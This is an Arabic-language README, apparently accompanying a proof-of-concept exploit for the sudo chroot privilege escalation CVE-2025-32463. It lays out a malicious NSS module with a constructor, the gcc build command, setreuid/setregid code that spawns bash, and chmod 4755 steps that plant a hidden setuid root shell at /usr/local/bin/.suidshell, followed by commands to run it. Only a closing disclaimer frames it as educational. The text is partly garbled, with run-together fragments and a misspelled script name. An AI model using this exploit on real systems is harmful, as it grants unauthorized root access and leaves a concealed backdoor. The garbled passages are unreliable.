
سودو تصعيد الامتيازات المحلية CVE-2025-32463 (الأفضل للحالات التي لا تكون فيها الشل مستقرة لإنشاء شل جذر جديد)
sudo -Rيُظهر هذا الدليل (PoC) تصعيد الصلاحيات المحلية على أنظمة لينكس من خلال إساءة استخدام خيار sudo -R مع وحدة NSS مخصصة. يستهدف الثغرة CVE-2025-32463، والتي تنبع من المعالجة غير الآمنة لملف nsswitch.conf ومكتبات NSS المشتركة في بيئة chroot.
يُكيِّف هذا الدليل، sudo2root، التقنية الأصلية عن طريق تجميع وحدة NSS مخصصة تستخدم سمة constructor لتصعيد الصلاحيات ووضع شيل setuid root في /usr/local/bin/.suidshell.
-R بواسطة sudo.sudo تنفيذ كود عشوائي كـ root، مما يكسر العزل الخاص بالحاويات والمستخدمين.sudo -R يُغيِّر الدليل الجذر ولكنه لا يُسقِط الصلاحيات أو يُعقِّم البيئة.nsswitch.conf خبيث وكائن مشترك libnss_* مخصص.sudo لتحميل مكتبة NSS التي يتحكم فيها المهاجم.__attribute__((constructor)))، ويضع شيل setuid root، ويُصعِّد الصلاحيات.sudo2root.c – وحدة NSS خبيثة:
setreuid(0,0) و setregid(0,0)gccنص برمجي باش للاستغلال:
etc/nsswitch.conflibnss_/sudo2root1337.so.2sudo -R sudo2root sudo2root
شيل Setuid:
/usr/local/bin/.suidshell/usr/local/bin/.suidshell id
chmod +x sudoiinject.sh
./sudoinject.sh
بعد اكتمال الاستغلال، قم بتشغيل:
/usr/local/bin/.suidshell
whoami # => root
sudoinject.sh # النص البرمجي الرئيسي للاستغلال
libnss_/sudo2root1337.so.2 # وحدة NSS الخبيثة (مجمعة)
sudo2root/etc/nsswitch.conf # ملف nsswitch مخصص يشير إلى الوحدة المزيفة
/usr/local/bin/.suidshell # شيل root النهائي مع setuid
sudo -R:-R <dir> في sudo تُغيِّر الدليل الجذر قبل تنفيذ أمر.nsswitch.conf مخصص مع passwd: /libnss_<name>.so، يقوم sudo بتحميله قبل إسقاط الصلاحيات.يتم تجميع الكائن المشترك باستخدام:
gcc -shared -fPIC -Wl,-init,exploit_constructor -o libnss_/sudo2root1337.so.2 sudo2root.c
يتم تشغيل constructor قبل أي منطق main().
يُنشئ ويُجمِّع شيل suid مع:
setreuid(0,0); setregid(0,0); execl("/bin/bash", "bash", NULL);
يتم ضبط الصلاحيات عبر:
chown 0:0 .suidshell && chmod 4755 .suidshell

MikiVirusهذا الكود مُقدم لأغراض تعليمية فقط. الاستخدام غير المصرح به لهذا الكود على أنظمة لا تمتلكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي. احصل دائمًا على التفويض المناسب قبل إجراء اختبارات أمنية.